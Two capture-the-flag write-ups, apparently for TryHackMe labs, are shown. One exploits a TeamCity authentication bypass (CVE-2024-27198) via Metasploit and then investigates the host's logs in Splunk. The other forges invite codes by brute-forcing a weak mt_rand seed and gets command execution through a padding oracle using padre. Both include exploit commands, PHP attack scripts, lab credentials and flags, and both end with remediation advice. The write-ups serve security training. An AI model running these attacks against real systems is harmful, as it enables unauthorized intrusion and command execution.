Difficulty: Easy
Tags: CTF, Remote Code Execution, Forensic, Splunk
Target IP: 10.113.190.140

Objective

The main objective is to determine how an attacker exploited the server and subsequently perform a forensic examination of the host to identify the attacker’s footprints during the post-exploitation stage.

Exploiting the Server

Reconnaissance & Enumeration

Scanning Services

Making a quick scan of the target would be useful to get more context of our scenario and to verify which services are available using nmap 10.113.190.140

Discovered services:

• ssh
• http
• ibm-db2

ibm-db2 is a family of relational database products from IBM for storing, managing, and analyzing structured data.

Using nmap -p 50000 --script db2-das-info -sV 10.113.190.140 confirms the DB2 listener details to identify what host, port, and features are used to authenticate with a DB2 Client.

Looking at the output, we can extract the port 50000 is speaking HTTP and identifies a path to login manually to /login.html page.

Initial Access

Examining the http service using a web browser to gather more information: http://10.113.190.140

Upon visiting the homepage and inspecting the Page Source, anything relevant was found.

Examining the ibm-db2 service (which is actually running a web interface) using the web browser: http://10.113.190.140:50000/login.html

The service is operating an old version 2023.11.3 (build 147512)

Directory Bruteforcing

HTTP Service

Using gobuster with a standard wordlist to find hidden directories and files: gobuster dir -u http://10.113.190.140 -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Discovered Paths:

Nothing significant was revealed.

IBM-DB2 Service

Using gobuster with a standard wordlist to find hidden directories and files on the specific port: gobuster dir -u http://10.113.190.140:50000 -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Discovered Paths:

• login.html
• 400.html
• forgotPassword.html
• resetPassword.html

Vulnerability Research

Searching for a vulnerability for the specific version 2023.11.3 in JetBrains products.

There is an identified critical authentication bypass vulnerability tracked as CVE-2024-27198 an allows performing admin actions.

Exploitation

Command Execution & Remote Code Execution

Knowing there is a specific vulnerability to perform admin actions implies we will be able to execute code remotely. To make the exploitation process quick, Metasploit will help to automate the entire process. Launch msfconsole

Step 1: Select Exploit module

Searching for the specific exploit module, search cve:2024-27198

Select the exploit,exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198

Step 2: Execute the payload

Firstly, examining the required options to be filled in, show options

The required options in this scenario are:

• RHOSTS
• RPORT

Insert the needed values use set RHOSTS 10.113.170.99 and set RPORT 50000 and verify that are correctly selected using show options again.

Verify if the target is vulnerable after setting the options using check, then run the exploit with run

Step 3: Environment Check

Execute basic commands to understand the environment:

• whoami
• pwd
• ls

The flag is mentioned to be in the home flag. Therefore, navigate to the specific folder using cd /home and ls ubuntu

Read the content of the file flag.txt using cat ubuntu/flag.txt

Output:THM{faa9bac345709b6620a6200b484c7594}

Home folder flag Found:THM{faa9bac345709b6620a6200b484c7594}

Investigation

The IT department has provided the compromised server. The goal is to identify the attacker’s footprints in the post-exploitation stage. Splunk will be the first place to delve into the scenario.

• Username: splunk
• Password: analyst123

Splunk Examination

Malicious User

Access Splunk using the following URL, http://10.114.181.179:8000

It is required to explore the Search & Reporting app to investigate the logs from the brains service. Select the option Data Summary to extract all the entrances classified by specific criteria.

Since the attacker has been authorized as a root all the authentication logs are stored in auth.log

Display all records captured from auth.log by selecting the time frame as All time

Since the next flag mentions user, looking at the section called INTERESTING FIELDS does not mention anything about name or user initially, but there is an option to select more fields

In the Field column there is an instance called name. By displaying the field, there is an interesting line that mentions the user.

Name of the backdoor user which was created on the server after exploitation: eviluser

By including the filter of the known malicious user, we can identify the day of the attack.

It is vital to inspect 7/14/24

Malicious Package

Within the Data Summary, the Sourcetypes section mentions packages. Therefore, the next step is to review its content. Before anything, apply an advisable filter to reduce the entrances by selecting Date & Time Range and specifying the date 07/14/2024

Now there are all the instances with the source type packages that were registered in the system before 7/24/24

The first instance contains a suspicious name called datacollector

Name of the malicious-looking package installed on the server: datacollector

Plugin Installed

To look for the malicious plugin, it is mandatory to first review the service that was attacked. It is called teamcity. Therefore, look in the Data Summary within the Sources section where teamcity-activities.log.

Repeating the same temporal criteria as for the malicious package and apply an additional filter *plugin*. The entries generated by Splunk will be the most relevant to inspect based on the scenario.

Looking at the first instance it reveals a bizarre name AyzzbuXY and it is a zip file. This is the plugin.

Name of the plugin installed on the server after successful exploitation: AyzzbuXY.zip

Conclusion

By scanning the IP, identifying the service on port 50000 as a JetBrains TeamCity instance, and exploiting a known vulnerability (CVE-2024-27198) that allows a remote code execution as the root user, we successfully retrieved the initial flag.

By accessing Splunk to review Data Summary where was registered the authentication and TeamCity service activities were registered as logs, we successfully retrieved the forensic flags.

Mitigations and Remediations

To prevent these specific vulnerabilities in a production environment, the following measures should be implemented:

1. Patch Management: immediately update JetBrains TeamCity to the latest version to mitigate known CVEs like CVE-2024-27198.
2. Network Segmentation: restrict access to administrative interfaces (like TeamCity login page) to trusted IP ranges only, rather than exposing them publicly.
3. Log Monitoring & SIEM: implement robust logging and real-time monitoring (like Splunk) to detect anomalous user creation, suspicious package installations, and unauthorized plugin activity.
4. Principle of Least Privilege: ensure that services do not run with unnecessary root privileges and that user accounts are strictly controlled.

Final Answers

1. Home folder flag: THM{faa9bac345709b6620a6200b484c7594}
2. Name of the backdoor user which was created on the server after exploitation: eviluser
3. Name of the malicious-looking package installed on the server: datacollector
4. Name of the plugin installed on the server after successful exploitation: AyzzbuXY.zip

Difficulty: Medium Tags: CTF, Web Exploitation Target IP: 10.114.184.31

Objective

The main objective is to exploit a weak cryptographic implementation to gain unauthorized access to the system, then leverage a padding oracle vulnerability to achieve remote code execution and retrieve the flags.

Reconnaissance & Enumeration

Scanning Services

Making a quick scan of the target to identify open ports and services using nmap. Executing a default scan, nmap 10.114.184.31

Output:

• ssh

Based on the result it might be interesting to scan even deeper using nmap -p- -sC -sV -T4 10.114.184.31

Output:

• ssh
• http

Exploring the HTTP service: http://10.114.184.31:1337

There are 3 interesting options to look further:

• Login
• Login with Invite Code
• API Documentation

Directory Scan

Looking to extract more possible paths using gobuster. Starting with a basic directory scan gobuster dir -u http://10.114.184.31:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Output:

• /css
• /js
• /logs
• /phpmyadmin

Extended Directory Scan with Extensions

Looking to execute a directory scan with extensions gobuster dir -u http://10.114.184.31:1337 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,zip

Output:

• /api.php
• /dashboard.php

Log Analysis

Investigating /logs endpoints http://10.114.184.31:1337/logs

It contains a log file called app.log

The relevant information to extract are:

• Email:alpha@fake.thm with the invitation code MTM0ODMzNzEyMg== has been deactivated
• Email: hello@fake.thm as a new user created
• URL: dashboard.php

Inspecting the main URL http://10.114.184.31:1337 with Network nav from browser development tools:

JavaScript Obfuscation Analysis

There is a script called api.js

function b(c,d){const e=a();return b=function(f,g){f=f-0x165;let h=e[f];return h;},b(c,d);}const j=b;function a(){const k=['16OTYqOr','861cPVRNJ','474AnPRwy','H7gY2tJ9wQzD4rS1','5228dijopu','29131EDUYqd','8756315tjjUKB','1232020YOKSiQ','7042671GTNtXE','1593688UqvBWv','90209ggCpyY'];a=function(){return k;};return a();}(function(d,e){const i=b,f=d();while(!![]){try{const g=parseInt(i(0x16b))/0x1+-parseInt(i(0x16f))/0x2+parseInt(i(0x167))/0x3*(parseInt(i(0x16a))/0x4)+parseInt(i(0x16c))/0x5+parseInt(i(0x168))/0x6*(parseInt(i(0x165))/0x7)+-parseInt(i(0x166))/0x8*(parseInt(i(0x16e))/0x9)+parseInt(i(0x16d))/0xa;if(g===e)break;else f['push'](f['shift']());}catch(h){f['push'](f['shift']());}}}(a,0xe43f0));const c=j(0x169);

Looks like the function has been obfuscated. Using the following website https://deobfuscate.io to deobfuscate the current code:

function b(c, d) {
  const e = a();
  return b = function (f, g) {
    f = f - 357;
    let h = e[f];
    return h;
  }, b(c, d);
}
const j = b;
function a() {
  const k = ["16OTYqOr", "861cPVRNJ", "474AnPRwy", "H7gY2tJ9wQzD4rS1", "5228dijopu", "29131EDUYqd", "8756315tjjUKB", "1232020YOKSiQ", "7042671GTNtXE", "1593688UqvBWv", "90209ggCpyY"];
  a = function () {
    return k;
  };
  return a();
}
(function (d, e) {
  const i = b, f = d();
  while (true) {
    try {
      const g = parseInt(i(363)) / 1 + -parseInt(i(367)) / 2 + parseInt(i(359)) / 3 * (parseInt(i(362)) / 4) + parseInt(i(364)) / 5 + parseInt(i(360)) / 6 * (parseInt(i(357)) / 7) + -parseInt(i(358)) / 8 * (parseInt(i(366)) / 9) + parseInt(i(365)) / 10;
      if (g === e) break; else f.push(f.shift());
    } catch (h) {
      f.push(f.shift());
    }
  }
}(a, 934896));
const c = j(361);

There is a constant value invoked by j(361) assigned to a constant variable c. By inserting console.log(c) within Console nav from the browser development tools it should display a value:

Output:

• H7gY2tJ9wQzD4rS1

Exploitation

Command Execution & Privilege Escalation

Trying this string (H7gY2tJ9wQzD4rS1) to access http://10.114.184.31:1337/api.php where it only requires a password, was the correct choice to access the API documentation.

After trying to log in as hello@fake.thm with the H7gY2tJ9wQzD4rS1 as the possible invitation code, it failed. Trying this string (H7gY2tJ9wQzD4rS1) to access http://10.114.184.31:1337/api.php where it only requires a password, it was the correct choice to access the API documentation.

Step 1: Cracking the Constant Value

It reveals the function that generates the invitation code against the user email.

function calculate_seed_value($email, $constant_value) {  
    $email_length = strlen($email);  
    $email_hex = hexdec(substr($email, 0, 8));  
    $seed_value = hexdec($email_length + $constant_value + $email_hex);  
    return $seed_value;  
}  
  
$seed_value = calculate_seed_value($email, $constant_value);  
mt_srand($seed_value);  
$random = mt_rand();  
$invite_code = base64_encode($random);

By knowing an existing active email hello@fake.thm it is only required to know the unknown constant_value. However, we already had an invitation sample code from alpha@fake.thm with the value of MTM0ODMzNzEyMg==. Observing the php code the invite_code value is encoded in base64 format. Using CyberChef to decode the value.

Output:

• 1348337122

This value was generated by mt_rand function. This function is a pseudo-random number generator that is not considered cryptographically secure, since if an attacker gets the seed, then the output can be predicted. The seed_value is generated by (seed_value = email_length + constant_value + email_hex):

• email_length
  • 14
• constant_value
  • Unknown
• email_hex
  • 61 6c 70 68 61 40 66 61 6b 65 2e 74 68 6d (using CyberChef)
  • Substring between 0 to 8: 616c7068
  • Decimal: 54 49 54 99 55 48 54 56

To get the constant_value we know the seed from alpha@fake.thm:

1348337122 = hexdec(14 + ? + 5449549955485456)

It is possible to loop over possible values by try and error, therefore typing a little script in php is going to be the way to discover the seed_value

<?php

$email = "alpha@fake.thm";
$target_invite_code = "MTM0ODMzNzEyMg==";

function calculate_seed_value($email, $constant_value) {

    $email_length = strlen($email); // 15
    $email_hex = hexdec(substr($email, 0, 8));
    $seed_value = hexdec((string)($email_length + $constant_value + $email_hex));

    return $seed_value;
}

echo "Starting...\n";

// Loop over possible constant values
for ($constant_value = 0; $constant_value < 100000; $constant_value++) {

    $seed_value = calculate_seed_value($email, $constant_value);
    mt_srand($seed_value);
    $random = mt_rand();
    $invite_code = base64_encode($random);

    if ($invite_code === $target_invite_code) {

        echo "Found constant value: $constant_value\n";
        break;
    }
}
?>

Output:

• 99999

Step 2: Generating Valid Invitation Codes

With the constant_value known, now it is possible to guess the seed_value that acts as the invitation code for hello@fake.thm.

<?php

$email = "hello@fake.thm";
$constant_value = "99999";

function calculate_seed_value($email, $constant_value) {  
    $email_length = strlen($email);  
    $email_hex = hexdec(substr($email, 0, 8));  
    $seed_value = hexdec($email_length + $constant_value + $email_hex);  
    return $seed_value;  
}  
  
$seed_value = calculate_seed_value($email, $constant_value);  
mt_srand($seed_value);  
$random = mt_rand();  
$invite_code = base64_encode($random);
echo "Invite code: $invite_code";
?>

Output:

• NDYxNTg5ODkx

The invitation code for hello@fake.thm is NDYxNTg5ODkx. Going back to the login with invite code page http://10.114.184.31:1337 and inserting the corresponding values to access into the account:

Flag after logging into the panel: THM{CryptographyPwn007}

From the dashboard view it is displayed another account admin@fake.thm, this account has an admin role. Knowing this new email and the constant_value of the seed generator function, it is possible to extract the invitation code from the admin@fake.thm account.

<?php

$email = "admin@fake.thm";
$constant_value = "99999";

function calculate_seed_value($email, $constant_value) {  
    $email_length = strlen($email);  
    $email_hex = hexdec(substr($email, 0, 8));  
    $seed_value = hexdec($email_length + $constant_value + $email_hex);  
    return $seed_value;  
}  
  
$seed_value = calculate_seed_value($email, $constant_value);  
mt_srand($seed_value);  
$random = mt_rand();  
$invite_code = base64_encode($random);
echo "Invite code: $invite_code";
?>

Output:

• MTc0OTQ0NzAzNw==

After attempting to log in as an admin@fake.thm using the generated invitation code MTc0OTQ0NzAzNw== it returned a failed attempt. Then, accessing as an admin uses a different encryption process.

Step 3: Padding Oracle Attack

Going back to hello@fake.thm account but this time using Burp Suite to observe all the interactions with the web service. Capturing the packet from the Proxy feature and sending the packet into Repeater to observe the response from the server.

There is a hidden input. The hidden input is declared as date with the value bRBHqQfs9f4UhFIitZJJelGfu+ezN6Ijmd7fg++7NVk=, this value changes on each refresh from the page. By deleting the value as an empty string and refreshing the web page to see if something happens.

Error Output:

• Padding error: error:0606506D:digital envelope routines:EVP_DecryptFinal_ex:wrong final block length

This system error displays the decryption operation reached the final block and the padding check failed. After a google search for the error EVP_DecryptFinal is part of OpenSSL API. After sending a few requests using different datevalues a new error emerged.

Output:

• Warning: openssl_decrypt(): IV passed is only 1 bytes long, cipher expects an IV of precisely 8 bytes, padding with \0 in /var/www/html/dashboard.php on line 28

This error means the code is calling openssel_decrypt() function with an IV (initialization vector) of the wrong length. The cipher/mode being used requires an 8-bytes. This value is common in ciphers such as DES/3DES in CBC mode. The value that we are providing is the IV.

After a research through the Internet, DES/3DES in CBC mode are susceptible into padding oracle and bit-flipping.

• Padding oracle attack: exploits how padding errors are handled. It occurs when the application reveals whether the padding of a decrypted message is valid or not, this enables to gain information about the plaintext without knowing the encryption key.

After dorking (site: github.com php padding oracle attack) through the internet to get a program that exploits this specific vulnerability. A good candidate was padre, it supports tokens in GET/POST parameters and Cookies. Download the latest version and grant executable permissions using chmod +x padre_linux_amd64.

After some try and error and getting used to the new tool,./padre-linux-amd64 -u 'http://10.114.184.31:1337/dashboard.php?date=$' -cookie 'PHPSESSID=754794498illlflv78gufj90hl' -enc 'ls'

Output:

• fXGHJVbs4t9lbmJyaWVhcw==

Executing again the same command but modifying the command that we want to execute, ./padre-linux-amd64 -u 'http://10.114.184.31:1337/dashboard.php?date=$' -cookie 'PHPSESSID=754794498illlflv78gufj90hl' 'fXGHJVbs4t9lbmJyaWVhcw=='

The system returned an output, therefore trying the specific path from the last flag question /home/ubuntu/flag.txt, ./padre-linux-amd64 -u 'http://10.114.184.31:1337/dashboard.php?date=$' -cookie 'PHPSESSID=754794498illlflv78gufj90hl' -enc 'cat /home/ubuntu/flag.txt'

Output:

• 8ToOYHlh0PuGepheR0TEN66XK6YqUx4yZQWGJFft495lbmJyaWVhcw==

Once having the encrypted command to get the flag we are going to use the following command ./padre-linux-amd64 -u 'http://10.114.184.31:1337/dashboard.php?date=$' -cookie 'PHPSESSID=754794498illlflv78gufj90hl' '8ToOYHlh0PuGepheR0TEN66XK6YqUx4yZQWGJFft495lbmJyaWVhcw=='

Having this value now its time to insert as the date value on the dashboard URL, http://10.114.184.31:1337/dashboard.php?date=8ToOYHlh0PuGepheR0TEN66XK6YqUx4yZQWGJFft495lbmJyaWVhcw==

Output:

• THM{GOT_COMMAND_EXECUTION001}

Content of the /home/ubuntu/flag.txt: THM{GOT_COMMAND_EXECUTION001}

Conclusion

By exploiting a weak pseudo-random number generator (mt_rand()) in the invitation code generation system, we successfully predicted valid invitation codes for any user email. This granted us access to the dashboard where we discovered a padding oracle vulnerability in the DES/CBC encryption implementation. Using the padre tool, we leveraged the padding oracle to achieve remote code execution and retrieve the final flag.

Mitigations and Remediations

To prevent these specific vulnerabilities in a production environment, the following measures should be implemented:

1. Cryptographically Secure Random Number Generation: replace mt_rand() with random_int() or openssl_random_pseudo_bytes() for security-critical operations.
2. Remove Error Leakage: implement generic error messages that don’t reveal internal cryptographic details.
3. Input Validation: validate and sanitize all user inputs, especially encrypted parameters passed to decryption functions.
4. Use Authenticated Encryption: implement AEAD modes instead of CBC mode to prevent padding oracle attacks entirely.

Final Answers

1. Flag after logging into the panel: THM{CryptographyPwn007}
2. Content of the /home/ubuntu/flag.txt: THM{GOT_COMMAND_EXECUTION001}